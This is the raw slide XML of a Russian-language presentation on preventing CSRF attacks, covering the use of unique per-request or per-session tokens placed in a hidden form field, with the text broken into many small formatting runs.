              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>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F0F2D7C-0DE2-4759-81B8-35FB58780B09}"/>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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Как предотвратить </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Рисунок 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99977F6B-D9F3-4F96-8663-2A76B45FFBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2425700" y="1326584"/>
            <a:ext cx="1282700" cy="1282700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Рисунок 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C7963-1EC0-476E-95E0-4FCA9E7D63EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4885225" y="4586336"/>
            <a:ext cx="1282700" cy="1282700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Рисунок 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D34ECCB8-EB1B-4636-9ACA-B30C906E6E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="272087" y="4586336"/>
            <a:ext cx="1282700" cy="1282700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Рисунок 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDBA3DB-4D4A-42C7-AEEB-742843FF703F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18370119">
            <a:off x="382350" y="2769116"/>
            <a:ext cx="2936557" cy="1526519"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Рисунок 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6CB263-6B34-4A10-BAEB-BB965748286C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2966469">
            <a:off x="2882182" y="2769754"/>
            <a:ext cx="3055561" cy="1644333"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1947430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8962691-8469-7477-FA5F-7BE9C6B6EB94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="44381"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1710597" y="1337958"/>
            <a:ext cx="4337184" cy="2672898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Текст 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FB18B6D-6C51-4F38-B155-E7FABE061F9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Client-Side: XXS, CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1200" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Рисунок 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD24516F-E024-4B56-8AE0-F15025EEF95A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="11647" t="10059" r="55373"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18514049">
            <a:off x="458381" y="2650936"/>
            <a:ext cx="2407992" cy="2250920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Рисунок 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02392F01-D607-4F7A-887E-C26FDD904409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="57237" r="88111" b="3322"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="844709" y="4806268"/>
            <a:ext cx="927100" cy="1054206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D37315E-8824-4423-A691-FBDD0633CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6144220" y="1868570"/>
            <a:ext cx="4852035" cy="3524042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="359410" marR="36195" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>П</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>р</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ед</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</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вра</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ь</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-55" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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можно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-15" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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уникальн</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ы</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м</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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токеном</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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в</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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каждом</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>запрос</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5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Такие</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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токены должны</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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быть</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-2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уни</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>к</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>альными</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-7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как</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-1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минимум</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-4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для</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каждой</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-3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с</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>сси</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="10" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" dirty="0">
              <a:effectLst/>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="359410" marR="36830" indent="-285750" algn="just">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Же</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>л</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>а</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>тельно</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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до</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="-5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>б</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>авлять</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="2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т</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>кен</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" spc="75" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ск</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>р</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ыт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="5" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>о</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>е</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="30" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>поле</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" b="1" spc="50" dirty="0">
                <a:effectLst/>
